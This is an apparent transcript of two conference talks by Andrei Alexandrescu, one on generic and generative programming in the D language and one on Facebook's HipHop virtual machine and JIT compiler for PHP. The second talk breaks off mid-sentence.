that program. And if we succeed and if we have different behavior, that would be a disaster because people would come like, you know, well, I took this encryption, you know, RSA algorithm, encryption that's like, you know, 7,000 lines of C, like paste it into a D program. It compiled what it doesn't decrypt. It compresses, actually. You know, something, I don't know. That's something else. You know, it's, whoa, that would be weird. It's, yeah, we don't want that to happen. However, whenever D compiles just C code, it's going to do what C does. So it kind of has this nice preservation of semantics. And C has a rule. It has many, you know, several rules, but it has one simple rule which is, you know, expression involving sign and unsigned types, unsigned kind of wins most of the time. So actually the way I like to say the rule, you kind of ingest, is like if an unsigned is within one mile radius of an expression, the expression is going to be unsigned. That was a joke. Thank you. Awesome. Okay. So because of that, we have this unsigned in 32, signed in 32, unsigned is going to win. And that can cause some problems which we eliminate through other means. But anyhow, I think the main point here regarding this whole unsigned comparison mess is that if you get to manipulate the types any way you want and actually mean in the D standard library, does do that kind of, you know, semantics sensitive typing which is very interesting. Yes? When you have reference types, this would be called reference, just know. When you have reference, yeah, this would be null. Okay. Yeah. But that's fine because we don't evaluate this. We just, yeah, we just look at the type. All right. And you know, there's all this discussion like, you know, people say it's good to have like non-null types, right? Types that can never be null. And this has been a sort of a sort of thumb for D because D has null and we kind of decided to make a library solution for it and so there's a non-null type right now which is being discussed which is kind of interesting. All right. Am I supposed to be about done? No. Someone finished early. That's nice. Okay, though. So far so good? All right. Well, where was I? Okay. So this kind of, what happened here? Okay. So far so good. Okay. Well, so it's one thing to say, well, I want to take the minimum element of like three guys. That's fine. But what if I take the minimum element of an array or a stream or file or, you know, kind of a database or whatnot. So at this point we get, okay, so it's sort of more of the same. I'm going to take min from a range which is some sort of collection of elements that can be iterated through. And this whole range thing has sort of exploded in popularity with D because it's a central concept to D which means, you know, C++ is iterators, LISP has lists, S lists and whatnot and D, 4D ranges are sort of the thing. So we say, well, if I have an input range which has the first element can be compared with less than, then I'm going to do a for each loop. I'm going to say, yeah, for each element, just, you know, do this and do that and do that, the other. And that's a nice implementation of min. And before anyone mentions it, I should tell you that, you know, you actually don't want to write this because it's a reduced function in the standard library that's just reduced with min, this range, and it's going to just work, right? So this is kind of showing you from sort of almost first principles kind of thing, like, you know, bona fide, you know, good developer code, I'm going to write a for loop and I'm going to do that and stuff like that. You don't want to recurse because then you have, like, you know, you've got to be careful about making it tail recursive and all good stuff. So this is a good example for the sake of a presentation. Now, I say, one nice thing is, like, you know, I don't need to specify the type, it's going to kind of take care of itself. I say auto, type deduction for the win, right? And what else is interesting here, I'm taking the first element, I pop the first element, I guess this is pretty much right itself, right? For each knows how to pop elements from a range. So I guess, you know, if you squint a bit, because for example, I didn't define this guy is an input range, which means he has a front, has an empty, has a pop front, that kind of stuff. But if you squint a bit, I'm sure you kind of get the gist of it. Great. And it's nice because it works over anything that can be iterated and this is, there's no amount of overemphasizing I can do here because this sort of generality is typical to for generic programming, which is say, yeah, I can take the, like, in Java it's very typical, like, yeah, I know how to take the middle of an array, but that helps in nothing in terms of taking the middle of a singly linked list. And that in turn doesn't help me much for defining the middle of a doubly linked list and so on. So, you know, this kind of generality is not actually very well represented in some languages. Here essentially this is sort of the very essence of the min algorithm, you know, the loop over anything because anything that has these primitives can be, you know, it can min over those, right? So this is sort of the essence of I want to take the minimum of many elements of arbitrary number of elements. By the way, let me ask you this. Do you know edit distance? Right, okay. Levenstein, edit, like, you know, I have two strings. How many of these does it take to transform one to the other? And what kind of data structures does it work on? Like what is the minimum data structure? You know, edit this, like, look at these guys, the dynamic programming, interviewers love it, you know. Erase, strings, yeah, so it's typically for strings, but more generally like a race, right? Yes? Lists. All right, so actually it's kind of very interesting that edit distance works on lists, but actually I saw an implementation in Haskell that the author kind of didn't figure that out and said, oh, I'm going to use a race here. So actually edit distance work on lists. This is the minimum you need. You know, you don't need really a race. So a race would be sort of a total order because they have to be contiguous on that stuff, and you don't need random access. You don't need random access for edit distance. And this is the kind of job you would do as a guy who does that, who does generic programming. You would think about these things, like, you know, what is the minimum data structure that edit distance works on? And this is the minimum thing that min works on because here's an interesting thing. For min, do you need to ever look back in the range? Do you need to kind of remember, oh, the fifth element I saw, oh, fifth element, nice. The fifth element I saw was that, you know, this is important to me. Is it? No, because you kind of just walk the bridge and the bridge can kind of just sink behind you, right? You don't need what's behind. So you're going to look at the current element that you don't care after you're done, you're done. And that's an input range. It's a stream. It's something that is evanescent. It doesn't have a presence in memory. So you can take the meaning of a very large file and it's going to work. And that's, you know, SQL actually is big on that kind of distinction. So this is very nice because input ranges represent exactly that notion. It's an input range. It doesn't have to be in memory. It could, as the example shows, it could be an array. I don't care because an array is better than an input range. It has more stuff to it, so much the better. For min, I don't care about the good stuff that array has except for the fact that I can actually look at one element at a time. Awesome. Well, argmin is a very, very popular, all right. Nothing happened. The situation is under control. All right. I walk too much. The camera folks are going to kill me. Okay. So argmin is sort of a popular notion for machine learning people. Like, you know, I want to take the minimum argument, you know, the minimum index of the index of the minimum element, the smallest element. So that's not much more difficult. I just have to kind of do a bit more work by kind of cashing the stuff and kind of saving the candidate. And you know, so my result is going to be the first element. I'm going to cache the function and all that stuff. What I want to emphasize here is this. Argmin alias fun. So alias fun is a higher order function, right? So argmin is a higher order function because I want to say what is the minimum, you know, argument in this range for which fun gives you the minimum, right? So I want to say argmin of square root or whatever. I want to, that's easy. Argmin of tangent or argmin of whatever, right? And at this point, I have a higher order function argmin that takes an alias and a range and is going to use the alias to invoke the function. And the nice thing about pass by alias is that it's extremely efficient. So one known issue with many functional languages of today is that as you stack these nice subtractions, map, reduce, and you know, higher order functions and stuff, they all have one in direction each. So by the time you have a stack of like seven, there's going to be like, you know, seven, literally like seven in directions to get to where you want to be, right? Pass by alias, short circles that by saying, you know, I'm going to instantiate for this particular function, I'm going to make a separate instance for this other function. So this is pass by alias. And again, the usual discussion of, you know, co-generated size versus dynamic library size and, you know, that binary code reuse that you asked, you know, these kind of caveats still apply, of course. So argmin, right, takes a function. Let me see if I have an example for argmin. Oh, thank God. Okay, great. So I have, well, I have a number of strings or whatever. And I want to say, well, which string has the smallest length, which which string is the shortest in this input? So I have the string and I apply this lambda, which maps anything to its length. And that gives me sort of the, what's the name, a one. It's going to be, give me one in the end. So with this, I kind of talked about things like, well, let's talk about, like, you know, what do we take to write a good, a nice min function, which is completely reasonable? And we figured out, you know, there's a lot of wanting solutions. But then we discussed, if you do the appropriate type manipulation, it's good. And the question is, you know, how can we put the means in the language to do such kind of time, type manipulation? And I talked about things like static if, which is great. I talk about, like, pseudo recursion, which is great. I talked about pass by alias, which is great. Okay? So this point here is very important. Because I have, you know, there's a lot of talk about, like, you know, I don't care about static languages. I'm going to do dynamic languages and such. And at least for my kind of workload at Facebook, you know, I think, I think this is going to be more general because big data and, you know, that kind of stuff is going to be more of it, not less of it in the future because the amount of data you play with and the amount of interesting things you want to do with it is just going to grow. And computers are not going to get any faster. So the question is, you want to distribute the thing. And at the same time, you know, your speed of processing is going to be proportional to the number of machines you use, but also proportional, like, in a very direct way, like, there's a multiplication there with the speed of each component. And we get to this point where we're asking ourselves, like, you know, I can distribute this thing very nice, but then it depends on the speed of each component. And if I can't make it fast enough, it's going to hurt me. And actually, even if I distributed it, there's a guy who says, I'm doubling the number of machines. Well, you're going to double the amount of power needed by those machines. And this is the major limitation here. I'm really digressing here, am I not? Okay, but I think this is nice. This is interesting to talk about, right? So the power needed is humongous at Facebook scale. I can't give you specific numbers, but I can say that every 1%, every 1% saved in efficiency of the site. And think of it that way. One person, like, many people say everything below 10% is negligible, right? So I'm talking about 1%, and I mean, people, like, work on a fraction of a cent, 1%. So 1% saving of speed, like, increasing speed of the site is a very significant amount of money in power costs of data centers alone. And that's the case for Facebook. It's a case for Google. It's a case for Amazon, Yahoo, and many others. And there's an increasing number of these companies that are going to have to use power as they're defining means of calculating costs. So that, for that reason, you can't afford often to say, you know what, I don't care about this, but it can, yeah, seven directions, I'm cool with that. You can't afford to be cool about that, quite literally, because it's going to be hot, right? So the machines are going to get really hot, right? All right. If you're more interested in that kind of topic, you should come see my second talk today, which is going to be at 3 o'clock in room 2, which is going to be about a very nice jit architecture that we've done at Facebook. I'm very honored to be part of that team now. And to see how, you know, exactly what it takes and how we did it to accelerate Facebook for 1 billion users. The process is closed. So now, let me kind of change gears a bit. Because, you know, many people say, generate programming, generative programming. And many people say, you know, there's this whole genetic programming, right? Which is unrelated. It's like machine learning, right? Genetic, we don't do that. We don't talk about that here, right? But there's generic and there's generative. Can you define generative for me? Generative, generative. Well, it's, I mean, if I didn't know anything about it, I would say, you mean, say, generate stuff, right? And actually, the reality is very close because it's programs that generate programs. It's code that generates code. Which is, oh, interesting. Let's see. Well, there's a connection here because generic programming very often requires specialization of algorithm which we want to generate automatically. And very often the specification is present in a DSL, domain specific language. Tell me a DSL that you use every day, day to day. Talk to me. SQL. SQL, awesome. This side, didn't talk much. Come on. I swear it, you use every day. Rejects. Not everybody should use it. I'm not saying what it should be using. You know, rejects is everybody's using it even though they shouldn't or whatever. So rejects, a lot of us use it, right? Make files. I mean, come on. It's a DSL. It's like, you know, and whatever, you know, whatever you use. What do you use? What's the latest and greatest? And? Is this what? SCANs? Who's using SCANs? All right. Who's using the Microsoft built-in whatever, right? Okay. So that's sort of, even if that guy is sort of a DSL, although you manipulate it graphically, all right? So very often you have this DSL notion. I got make files. I have rejects. I have print tests, format specifications, you know, string templates, all that stuff. All of that is DSL kind of stuff, right? That's very interesting. So what do we do about implementing these DSLs? Well, one simple solution is like, well, we're going to kind of make the language, the host language look like the DSL and we overload the operator, some of that good stuff. And I don't think that's a great thing, but, you know, whatever works. And I gave some examples already. Some more interesting example are EBNF grammar, right? And to define a language compiler. Portable expression grammar, this is all EBNF on steroids. SQL was mentioned. And, you know, to try to force every of these, each and every of these DSLs into the same host language would be a bit forced. So indeed, we have a different approach which is very interesting. We kind of stumbled upon it. So we're going to use it with native grammar. We're going to process the grammar in compilation and we're going to generate the code accordingly. It's not a macro system. It's sheer code generation from strings. And let me start with a little insight. So this is an absolute classic, right? I don't need to talk about, like, how do you implement factorial in a language that has loops? Yes, this is how you do it. Okay, so this is interesting, but here's the thing. Well, I have a factor of 10 and I get an auto. I kind of, this is like a U long. F1 is factor of 10. And I say static, F2 is factor of 10. When I do that, the compiler is going to evaluate the factor during compilation. Okay, this is how I'm going to, all of a sudden people walk up from, you know, what, what? Okay, so this is what happens. You have one body, but you can actually compile it and evaluate it like classic, like any imperative language would do, but you can also, with the same core syntax, you get to evaluate during compilation as long as you evaluate within a static context. Huh, what the hell can we do with that? Well, let me tell you about the second component of this ploy here. There's a mix-in keyword that says, you know, give me a string and I'll make it into code. So give me a string and I'll compile it, right? It's like eval, but it's just compile time only. So I can actually call a function and the function is going to be evaluated in compilation. It's going to give me a string and I'm going to transform that string into code, which is, oh, what's going on here? So, okay, so we have two things now. Compile time evaluation, we have mix-in. And at this point, I got to imagine we had a big, like, oh, my God, because you get to generate strings with compile time evaluation and you get to mix into new code. And that's how Whitehall is implemented, by the way. Right? So you get to actually do real work during compilation and mean it, like, you know, real, like, actual work. You can create objects, you know, do stuff, right? And then you get to generate strings during compilation and those strings, you get to actually say compile the stuff, right? All right. So this is kind of a big insight. And here's how D does bit fields. D does have a bit field facility like C because we thought it's like, you know, too low level to dirty our hands with it. But it accepts a very simple mix-in function that takes type, takes name, and takes width. And you give it more of these guys and it's going to take care of generating all the code that takes care of the bit fields, you know, all the masking and all that, you know, rotation and all that stuff. And all of it is library code, it's not in the compiler. But this is just the start. I mean, you know, it can get really, really interesting. I mean, consider this. There's a work by Philip Seagal, which is, you know, he defined a grammar parser and the code generator and you can, you have a simple expression and value to here. Expression is like factor and, you know, more factors and then I have an ad expression, which is plus, minus, plus, minus, factor and whatnot. So you have this grammar syntax in a string. That string is passed into the function called grammar, which is defined by this guy. And the result is a string of code, which you're going to ultimately mix in into your decode and congratulations, you got yourself a parser. This reminds you of like Lex Yak and Antler and derivatives, right? But it's all indeed, doesn't need any extra kind of program, right? And it sort of holds water in a, oh, I'm kind of almost over the time here. Sorry for not mentioning that to me. All right. So, very easy to kind of play with this. But you know, my point here is that it kind of holds water because, you know, there's, the D grammar itself can be expressed in 1000 lines and it generates actually 3000 code, 3000 lines of actual parser code that you actually, you put the grammar in D and it kind of parses it with D and you generate D, which you compile and you compile is D. Oh my God. Okay. I'm not even sure I said that correctly. All right. So you can think of it as a highly integrated Lex and Yak. And last point I would like to make before I go, you know, and Jeremy and whatnot is an actual practical result. So there's a regex which is kind of the classic thing. You can take a string, standard input or whatever and you make it into a regex and that's fine. This is sort of the classic thing. Static is CT regex and it takes the string during compilation and it does its own specialized automaton generator in there. Now question, which is faster? The same string. It's the same regex. Which is faster? What do you think? So the first is I kind of bonafide classic regex that people do today. And the second is takes a string, looks at it and generates a specialized automaton just for that particular regex. Yeah. The second is going to generate its own state machine. The first is going to generate a generic state machine which is going to work for all regex is going to carefully kind of do things. Which is faster? The second one or the last one which is correct. What other opinions? They're equally, okay, great. Well I think if like you're a perfect program probably no. Because this guy has the ability to kind of generate a very unique code, parse or automaton that's only going to work for that particular string and best, right? Now here's the difference. All right. So first you have your Java 7. If you want to do fast regex don't do this, right? You don't want to use that. Kind of slow. Everything else is kind of here, right? This is a C++ library written by my friend Eric. This is the runtime edition of the regex that I just told you about. It's called FRED. All right, so it's kind of there. And then we have RE2 which is a highly optimized generic regex engine kind of written in C. And then we have V8 which is the Google JavaScript regex which actually uses specialization inside and all that good things. Which is like wicked fast and I use it like this is once. So this is like the fastest in the world, V8, right? And then there's the compile time version of the D implementation which is actually faster. So V8 is like oh my God, it's the fastest in the world. It can't do better. And then the student comes and at Google Summab of codes last year he wrote this which is actually faster than the fastest in the world. Faster than the fastest in the world. Thanks very much. Thank you.
|
Generic programming holds great promise – ultimate reuse, unprecedented flexibility, and never a need to reimplement an algorithm from scratch due to abstraction penalties. Unfortunately, the shiny city on the hill is difficult to reach. C++’s generic power has effectively reached a plateau – anything but the simplest generic constructs quickly turn an exponential complexity/benefit elbow. C++11 fails to be a strong sequel in the generic programming arena, and many other languages don’t seem to “get” genericity properly at all. The D programming language is a definite exception from this trend. D makes short work of the most formidable generic programming tasks achievable with C++, and makes virtually impossible tasks readily doable. It also reduces the relevance of “Modern C++ Design” to that of an introductory brochure (much to the dismay of that book’s author). This talk has a simple structure. It will pose a few generic programming tasks that seem difficult or impossible with current language technology, and then will show solutions in D that solve said problems.
|
10.5446/51538 (DOI)
|
Hi, my name is Andra Alexandreski. I'm seeing a few folks who've been in my first talk today. This talk is going to be quite a bit different. I'm going to talk about some work by Facebook, which is relevant because it's open source, so it can be used by anyone. It's a virtual machine for the PHP programming language. And before you answer in kind with, you know, it's not what's wrong with you using PHP and all that stuff, I'm going to thoroughly argue that the point that such a virtual machine and JIT is a good thing to have and using PHP has a certain, you know, it has certain assets going about it, particular for Facebook, which has an interesting history with PHP. So the hip-hop VM has been Facebook's production PHP engine starting sometime November of last year, and it has been the workhorse behind Facebook ever since. It's a JIT compiler, meaning it can interpret code, but it can also write on the fly compile code down to native x86 assembler and execute it all at once. And it has an unusual combination strategy, which we're going to discuss, which I find interesting and applicable to a variety of other languages. So as I mentioned, I'm going to argue, you know, why PHP? So PHP has a number of liabilities, which are well known and discussed in the community. I'm saying some already, I'm seeing a couple of smirks from people in the audience like, yeah, you know, PHP, why don't you the D guy, like all this clean language and stuff and, you know, what's wrong with you? Well, consider, like, let's turn the clock back nine years, 2004. At that point, Facebook was just starting, and, you know, the now historical dormitory at Harvard and all that good stuff. And at that time, there's not a lot of choice in terms of, like, let's build a great website distributed and, you know, used by a billion people and less stuff. First of all, there's not one billion people probably online at the time, 2004, let's say. Probably there were one billion people, but that was it. So at that time, PHP was pretty much the choice, you know, the default choice of a language if what you wanted to do is build a site real quick, you know, set of the pants operation, like, you know, literally putting on, you know, you know, you know, in your, on your desk, you have a machine and it's shared by, you know, six users at a time or whatever. And you want to develop real fast, connect your database, have all that rapid cycle of development. So PHP was it. And PHP has one very interesting thing going for it as a language that's aimed at robust development, as strange as that might sound, which is the following. In PHP, every request, so essentially the lifetime of a script in PHP, lasts from the time, the moment the request is made until a request has finished. After that, it kind of goes away, right? Well, that state goes away. In contrast, there are many other web services engines that actually keep state between invocations and kind of try to kind of resurrect the zombies from the last request and stuff like that. For PHP, the simple life cycle of a script has been, had turned out to be very successful for Facebook because any bugs either in the engine or the script's being run, any memory leak, you know, any issues that there were, would essentially disappear with the termination of that particular request, which means any other fresh request would start with a brave new world, clean slate, and would just run however it runs. So there's no sort of progressive deterioration of things as the site was being used. So, well, 2004, Facebook is launched using PHP, had a relatively low traffic, which has grown ever since, and it's become sort of a blessing and a curse in the sense that right now we have many millions of PHP code at Facebook, and it is, you know, like, you know, PHP used by very good developers, it turns out to be a very convenient tool to have around. So essentially, like, anything you want to that Facebook, like, you know, any change you want to make to the site, you can very easily dog food stuff that we already have working and tested and thoroughly, you know, streamlined. So once you consider this, it is very difficult to imagine for a Facebooker to imagine day-to-day work as a front-end designer without kind of just, yeah, I need to get a list of friends, so I need to kind of, you know, display with look ahead and all that stuff. It's like, it's literally like lines of code away in PHP with the tools that we have. Definitely, you wouldn't imagine just as a sort of a site. So how many of you are using Facebook like graph search, like, you know, the search at the top of the Facebook? Yeah, okay. So you know what I'm talking about, like, there's this thing, and essentially search for friends, if I search for OVE, and I type OLV, and by that time I see this guy who's like testing his camera on me right now. I thought he's bootlegging me, which made me feel real good for a few seconds there. So, you know, essentially type a few letters and you see out of, like, you know, not only 150 friends or what have you, but out of literally like 1 billion people, because you can find people who are not your friends and are directly connected to you and kind of, you know, second degree connections and the kind of people around you geographically and all that good stuff. And, you know, we wouldn't build that in PHP. So let's clarify that. We wouldn't build that in PHP. There is a service that is implemented in a system language, namely C++, which is going to have an index, literally there's a hash table with millions of elements like a billion elements or whatnot. And this hash table is stored on distributed on many servers and the PHP service is going to give a very simple, easy to use interface to that real-time service. So, you know, it's good to make a distinction between what you can do and what you think of in different levels and in different languages. So all that being said, parenthesis closed, PHP is a great tool for ad, just one that widget, just put it on the page and it's there and it just works. This has worked like tremendously well for Facebook. I should add that it may not work just as well for the same size of code at other companies because at Facebook there is a huge focus on good engineering and kind of, you know, hiring the best engineers and such, whereas kind of saying, you know, let me kind of hire like a few average developers and try to build a big thing with them, it's more difficult because, you know, unless you use PHP with care, it's going to exhibit all of the issues that we know has, like, you know, plus has the return times completely bizarre and things like that. So at Facebook with the appropriate discipline and kind of use of talent, we're going to kind of carefully avoid such problems. So continuing the story, from 2004 to 2009 we used the Zend interpreter, which is a switch on bytecode C interpreter. So essentially it's a, literally it's a big switch and reads the next bytecode, which is like one octet, like, you know, one byte, and which is the bytecode representation of the PHP code. And depending on that guy, it's going to do different actions, you know, fetch operands and do stuff and whatnot. And that's pretty much the most direct implementation of interpreter that you can think of. But we figured Zend is too slow for us. We also figured out, you know, again, the code was being so big, it was at a point sort of a lock-in issue because we couldn't switch the language cheaply, right? So in 2009 we launched HipHop, the static compiler, which is kind of an interesting endeavor. Take the PHP code, compile it to C++ code, take the C++, which creates like a large, humanly, next to unreadable C++ program, right? And it's all kind of, you know, virtual dispatch and all kind of dynamic typing and all that stuff. But it's in C++. And then take that C++ compiler and compile it with state of the art compiler, such as GCC. And at the end you're going to get two gigabytes binary, which would not even work on 32-bit models. You have this two gigabytes binary, which was Facebook, was the site. So you know, launch that guy and just, it's Facebook. It serves Facebook. I'm going to open another process just for you because I find this story just too funny. So you have this big C++ program. So you can imagine any number of problems happening with a large, generated C++. C++ is the terrible intermediate language to work with. And here's an example. That program had 30,000 global variables. It's generated. I mean, in a way it's no sin, right? It's generated. So you can say, I didn't sin in father, you know, and that's kind of stuff. So it has 30,000 global variables. And it was big slow to compile. So you kind of, you know, we issue a bug report to GCC and what's going on there, folks, and you know, why is it so slow? And they said, well, you have 30,000 global variables and we put them in a singly linked list and we searched that list for name lookup. So it was a kind of linear search for 30,000 things whenever you have a name somewhere. And we said, well, then better fix that crap because it's, you know, linear search in this day and age is kind of embarrassing. And I said, no, guys, you're embarrassing because you have 30,000 globals. Like, no, same program in this world should have this many globals. And we're like, all right. So compiling the site took a good few hours. And not because of only that. It's a very large program after all. So, parenthesis closed. So we've been running with that engine for a good while. And can you see any problem with this model of building the site? Like, think of this. Think of your PHP developer working on the site and you want to kind of, you know, get work done. What problems do you see? Not you because you answered yes. Feedback cycle and debugability. Did I give you an invitation for tonight? Okay. I'll see you then. By the way, so I'm for folks who have not been in my first talk. So I have some wonderful invites. I presume people who are interested in this kind of stuff would be interested in talking to me and my coworkers a bit more. So this is a private party by Facebook tonight at 6 at a very posh location in Oslo, free drinks and food. So ask me questions if you want to get some of this good stuff. All right. I think it's a, I have questions. No, I didn't. Hold on. Okay. So the whole debug cycle. So for a while, while we had the static compile, we had this weird situation which was, you know, if you want to kind of develop the site, work on the site day to day, you'd be using the interpreter. And then if when you're kind of, yeah, I'm done and stuff, you push the thing into version source control and we had this, this short, this long cycle build which would rebuild the site overnight and whatnot. And well, guess what? There's the interpreter which does things one way and there's the compile which does things the other way and supposedly the things are 100% identical. And as I'm sure you know, it's like synchronizing clocks. You can never do it like 100%. Right? There's going to be small variations in behavior. There's always going to be this one little thing, this one little sequencing, this one little quirk that you're not going to get the same. So we did have issues with, you know, this works on my machine under the interpreter. It doesn't work on the compile thing and oh my God, let's take a look. Let's see what the hell is happening here. So definitely that was not tenable for a long time. But it did by us 2X compilation, sorry, 2X run speed. So switching from Zend to Hip Hop was like 2X faster to run the site. So that means, I mean, you know, translate the other way if you look at it from the other frame of reference, it means less power consumed for the same functionality or more functionality for the same available power. Which is kind of awesome because, you know, at Facebook it's always good to have some more committing power available for interesting stuff that could be going on, people you may know and, you know, good ads, you know, which I know you guys hate. And stuff like that. Now, the power consumed per user of Facebook, we published that a while ago. Actually, it's very low. It's like, you know, it's in the hundreds of milliwatts per user. So it's like you have a little light bulb there and it's just, you know, that's how much power you consume per user. So it's very economical in that sense. Okie doke. 2012, well, as I said, last November we launched the VM, but, you know, it kind of had a long history. We started development a couple of years earlier and it's a virtual machine. It's an adjusting time compiler and it unifies the development and production which solves that problem that you mentioned because essentially you could use the same exact generator for both day-to-day work and the website proper. So that solved a huge problem. In a way it was a step back because it's much more like an interpreter than a compiler, but in many ways it's been a step forward. So let's take a look at how much faster things have been due to using this technology. So, ok, so we have Zend which is like, you know, less than 12 tries as slow. And this would be like, let's say, as reference, let's use the throughput that we achieved through the first release of hip-hop. So this is the throughput, day-one, hip-hop. And then the nice thing is that people have worked on the compiler to generate better code to, you know, kind of make it better and stuff like that. So they kind of, you know, it's like squeezing blood from a stone. They kind of got yet another 2.5x, 2.3x improvements just by improving the static C++, the static compiler that generates C++, generate a better C++ and things like that. So we are way, way ahead like what we would have done if we use like kind of run-of-the-mill technology for running PHP. That was great. Do you think you can do better than that with the VM or is it going to be worse? I mean, what do you think is going to sit if you have like, okay, let's build a VM on JIT for this? What's your opinion? Honest question. It's not a trick question. Lower? Yeah, actually, that is correct. In the first release that actually worked, it was the release, internal release. In the first kind of version of the interpreter that actually worked, the JIT was 8 times slower than the production hip-hop. And true story, so I, you know, I was like, this team does interesting stuff and whatnot. And I imagine at the time, he said, I would not advise you to join that team because that team is not going to work out. The project is not going to kind of work out. And one great thing about Facebook is that we get to try like weird projects all the time. And those that succeed are like, you know, they're just amazing because they're so out there that if they succeed, the win is big. It's not kind of a conservative bet that's likely to succeed in a little way. So, very interesting. So, I did end up on that team, by the way. So, I'm on that team now. So, kind of, there's a poetic revenge of sorts. So, that's the static compiler evolution. Very nice. Probably Zen kind of, you know, kind of improved a bit too, but I presume it's never near that. So, from the whole project of JITing PHP, we kind of learned a very important thing. That type inference is sort of the crux of the matter. The most important, the one single most important thing that you care about when it comes about JITing, at least for this particular language. Let's say this particular language class because probably things like Python would enter the same, the same realm. So, type inference would be the, you know, the best thing to look at and the most important sort of the focal point of the whole discussion. And let me kind of give you the details on why. First of all, PHP has dynamic types. Like, who knows the Golbach conjecture? Question for the ticket. All right. So, the Golbach conjecture is like a famous conjecture devised by a guy called Golbach in 1742. I'm making this up. So, sometime earlier, it was the 18th century. So, he said, you know, I tried it for a few numbers and it turns out that every even number greater than two can be expressed as a sum of two prime numbers. That's interesting because the guy had kind of tried it on like, I don't know, 15 numbers or what, you know, like a few numbers because he didn't have a computer. So, now it's checked up to like, you know, 10 to the power of 18. It's like they didn't find one that doesn't work. So, anyhow, it's one of the greatest open problems in WScience. And sorry, in math. And this is going to be, well, depending on Golbach conjecture, give me a float or give me a string. So, you can't know statically what's going on, right? Another very classic example is like, let me give a row and give me the first element of that row. And depending on the scheme of the data, basically, you're going to get an integer or float. And not to mention like, you know, division and the device can be an integer, floating point or even a string or a map or what have you. It's complete dynamic, right? So all of these are also like, in part, good power to PHP because you get to like manipulate the databases in a very convenient manner. By the way, question for you guys. How many of you use a dynamic language like this in your daily work? Okay, for a moment. Great. So you know, there's understanding of all of the stuff. It's kind of useful and good to have and, you know, apple pie and motherhood. So, however, we figure something interesting. We figure out statistically, statistically, most expressions have one type, which is very interesting because it kind of takes into a whole different world in which you don't care about the exact type, you care about the most likely type. And there are some good examples. I mean, for most of your PHP work, you know, interpreted work, you know that, you know, you divide two numbers, it's a number and that kind of stuff. So for example, this guy is almost never false. I think it's false if this is not or I forgot the, you know, it's one of those weird PHP like PHP's hell kind of articles, right? Oh my God, if I divide the map by a string, it's going to give me false and that kind of stuff. I don't know, is this the case? Who knows PHP real good? Okay, nobody. Well, I guess it's a compliment. Database row types kind of stay put. So whenever it acts as the first time in any row of a given database, it's going to give you the same thing. Global is always true or always false, at least within a running program and so on. So, you know, this is very interesting because there's a kind of a long range correlation here. It's like, you know, for example, like a century ago, like algebra was the thing in math and kind of, you know, all of this, you know, mathematical analysis and kind of, you know, derivatives and integrals and such and algebra. So these are the kind of big things in math and right now, what do you think is the biggest thing in math? What's hot in math? Big data. Exactly. So what is the big, what is, you know, this, what was the math aspect of big data? Machine learning, what's the big aspect, what's the mathematical big thing? Statistics, you got it. I give you an invite already. So statistics is sort of the new algebra, if you wish, right? So you're not operating with kind of, you know, known things like discreet things, things you know about. It's all statistics now and machine learning is great application of it. You know, big data is a big, because what do you want to do on big data? Do you want to look at every single thing there? Sometimes big data, look at aggregates and statistics. So I was saying like, there's this long distance relationship between, you know, statistics is a new algebra in math and statistical typing is the next big thing in writing a good interpreter. This is interesting. So indeed, statistics are good because for a language like this, you know that an expression can have any possible type. But actually, statistically is going to be like, you know, 99 times over 100 is going to always be one type. And yeah. Does the statistics change with the quality of the engineers? You know, I mean, honestly, I'm going to be very serious here. I think this is a good research topic because I could presume that a certain style of programming or a certain, I don't know, style of application or a certain, you know, approach to engineering would lead to different spreads of these statistics. So I don't know, what would be your guess, folks? Like a bad programmer writes statistically more kind of entropic types or not? So this is kind of an interesting question to ask oneself and it would be a good subject for a study. But, you know, if I were like a, you know, one of them developers who issues a result that tells me I'm crappy, I don't want to be in that study, you know? So I kind of want to avoid that. You know what? Don't publish that. Okay. So at the same time, let me kind of, kind of, issue an opinion on this. I think people who write highly entropic types, if you wish, with statistics that are spread like, you know, in a way they exploit the language better because they take advantage of the dynamism in ways that may be creative. So that's a kind of interesting open question. All right. So our vision with, I mean, my team's vision, I wasn't there yet with HHVM, is that, well, let's kind of keep an eye on types and the statistics of types. And we're not going to generate code. We start by interpreting code and that's what many VMs actually do, many JITs actually do. So, you know, kind of interpret code and kind of track the most likely types to be there. And you discover types that cannot be inferred in real time. One interesting kind of side point is that we didn't want to build like the absolute best static compiler. So we didn't want to kind of, oh, yeah, we're side of the PHP program and, you know, collect statistics and whatnot. And I want, they do want to have like the minute, the minute optimizations that are the hallmark of modern compilers. For example, like, you know, something that worked for 70s compiler technology would have been great for us, but, you know, the, the matters were not compiling C. We're compiling different language. So our approach was take PHP, watch the types, generate specialized code for types that I'm going to show you in a minute. And the generator of specialized code for those types does not have to be the best compiler ever, right? So far so good. And by means of introduction, one step, you know, one step that was done way ahead was PHP has sort of a semi-standard bytecode format. Which is kind of simple. So this is like, you know, A plus B gets C is going to be translated into a simple stack machine bytecode. So you're going to push the, you know, push argument two, push argument one, add, and then set left value to the result. All right. And a simple program. I swear I didn't design these slides, but I discussed Min and Max in my previous talk. And I swear there's another guy who wrote these slides and, you know, he also discussed the same example, call it serendipity or monoculture, if you wish. So function, my Max A and B, I'm going to not be very order here, but, you know, this is PHP. So, you know, let's see kind of step by step what happens to this function to the point where it gets munched by the interpreter and we get results from it. So first of all, you know, you can call like Max of two integers good, two floating points good, Boolean, good, arrays, which is kind of interesting. Other arrays, which is even more interesting. And strings, which is going to return the Max in string. So we have all this polymorphism encoded in a very terse manner without types. It's all dynamic, so it's all going to be dynamically dispatched and all. All right. Well, let's compile down to bytecode and I'm going to translate, I'm going to tell exactly what happens here. So I'm going to push an L value, which is the second argument I got on the stack. So this one is like, you know, second argument on the stack and zero is the first argument on the stack. So with this, I'm pushing A and B to the sort of operand stack, right? Who knows, who's familiar a bit with this notion of like stack machine? Okay. I don't need to explain anything. I'm done. Okay. So I'm pushing these guys on the stack, greater, it takes the top two things and eats them and puts away, puts back the result on the stack, stack machine. You raise your hand. Come on, right? You raise your hand. Everybody rose their hand. Okay. So, and then if the result is zero and then I'm going to go here and I'm going to push the first guy, the second guy and otherwise I'm going to push the first guy and return. Awesome. And I'm done. Terrific. And this all is bytecode, but it's sort of a high-level bytecode if you wish because, for example, like this GT is kind of, you know, function code that kind of looks for strings and knows about the race and all that stuff. So it's sort of, you know, it's high-level bytecode. This is our HH bytecode. This is our internal name for it. Great. Well, how do we get from here? Let me get back a bit. How do we get from this bytecode to something that's really fast that kind of is able to do the integer version real fast and stuff like that? So we had, one of us, you, we, and it's like really the team before I joined. So this is sort of what on the bridge now? Yes? Why did we choose a stack 